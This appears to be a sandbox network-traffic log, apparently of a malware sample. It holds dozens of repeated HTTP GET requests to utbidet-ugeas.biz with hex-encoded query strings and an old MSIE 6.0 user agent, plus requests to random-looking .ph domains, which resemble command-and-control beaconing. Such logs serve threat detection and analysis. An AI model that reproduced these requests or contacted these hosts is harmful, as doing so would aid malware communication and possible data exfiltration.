Source: global trafficHTTP traffic detected: GET /d/N?0216471A6811471A6824473268164794BB827FB2321747DAC014442C462469235A26773468 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0216471A6811471A6824473268164794BB827FB2321747DAC014442C462469235A26773468 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740F6E HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740F6E HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72D62 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72D62 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA615 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA615 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD5615DA HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD5615DA HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: btnmut.phCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F30C HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F30C HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156C70 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156C70 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A2038A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A2038A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148372 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: ysbgwpqywiujo.phCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0203E9253204E9253231E94D3203E9ABE197D18D6802E9E59A01EA131C31C71C0033D90B32 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0203E9253204E9253231E94D3203E9ABE197D18D6802E9E59A01EA131C31C71C0033D90B32 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678BE9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678BE9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DBA9D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DBA9D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607CAF HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607CAF HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0D5C HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0D5C HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
